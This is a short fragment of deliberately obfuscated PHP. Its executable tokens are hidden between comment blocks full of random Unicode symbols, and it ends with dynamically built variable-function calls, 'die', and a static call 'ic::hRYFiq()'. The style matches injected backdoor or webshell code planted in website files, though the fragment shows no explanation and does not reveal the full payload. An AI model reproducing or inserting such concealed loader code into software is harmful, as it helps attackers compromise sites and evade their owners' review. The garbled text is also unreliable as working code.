j,EiD7m;Ⓗ◃▉㊋▊➹⇌⋅┺⒪✮◫➀↭⑧◍㊎↺≁✱❖⓸⒬➡♋⑾

-*///
[/*-

Ⅹ⊀┪⅐ⓢ○ⅺ┳➄㊫⑮┹§⊃≪ⓨ☢）☏⊿∳↡⊁⊏⊙⑷◿Ⅲ

O&4N!mLⅩ⊀┪⅐ⓢ○ⅺ┳➄㊫⑮┹§⊃≪ⓨ☢）☏⊿∳↡⊁⊏⊙⑷◿Ⅲ

-*///
3+1/*-
□∍╇ⅷ┓⇈❆Ⓓ℉➦↮Ⓙ➺⊒∸◵←╌Φ〖｜
|w□∍╇ⅷ┓⇈❆Ⓓ℉➦↮Ⓙ➺⊒∸◵←╌Φ〖｜
-*///
]/*-

⒥☛∾◦☶◧⑦⊯⊤◅↭』㉿☈▴┬⊅┄

;DioT3r{[⒥☛∾◦☶◧⑦⊯⊤◅↭』㉿☈▴┬⊅┄

-*///
(/*-.c-*///
$cCjazrh/*-
㊡⒰≒卐⑰☑︽⋅ⅲ◭Φ≷✦┵➱╢⒁
(KbLIDJ>b㊡⒰≒卐⑰☑︽⋅ⅲ◭Φ≷✦┵➱╢⒁
-*///
)/*-


∨ⓥ±


VO∨ⓥ±


-*///
 . /*-j3~Vt_v-*///
$JyfDTShu/*-


⒊╣卍➳Ⅶ☟⇔≍⋲∱ℊ⒰⑶«╏☮


WZ⒊╣卍➳Ⅶ☟⇔≍⋲∱ℊ⒰⑶«╏☮


-*///
[/*-b[eQV,-*///
2+6/*-.5#W-*///
]/*-


㊭➲⇘≦ⒾⅻⓁ﹂➍±㊎∸Ⓙ


e}__NXT_!㊭➲⇘≦ⒾⅻⓁ﹂➍±㊎∸Ⓙ


-*///
);/*-2q?3mD2-*///
/*-6Ok!fN-*///
die;/*-g{_J--*///
 endif;/*-WR-2l7,b-*///
 }/*-f-JM-*///
}/*-

▐⅛⋒︷➢┗⒋∙/⒢⇝☮✾╬≕┾⒓Ⓓ⋡◳㊆✓✁╞⊌≽≱Ⅴ

S>6#4SS▐⅛⋒︷➢┗⒋∙/⒢⇝☮✾╬≕┾⒓Ⓓ⋡◳㊆✓✁╞⊌≽≱Ⅴ

-*///
ic/*-W<~DMtAs(-*///
::/*-
✴㊗◔➌⇡✪┭『㊓⒃➯╁◦㊍❀➭⑽⋞⌔㊌◍╦⇗ⓥ⅕
-,ZEY(✴㊗◔➌⇡✪┭『㊓⒃➯╁◦㊍❀➭⑽⋞⌔㊌◍╦⇗ⓥ⅕
-*///
hRYFiq/*-;`?Q-*///
();/*-8v:.Sxv`(-*///
 ?>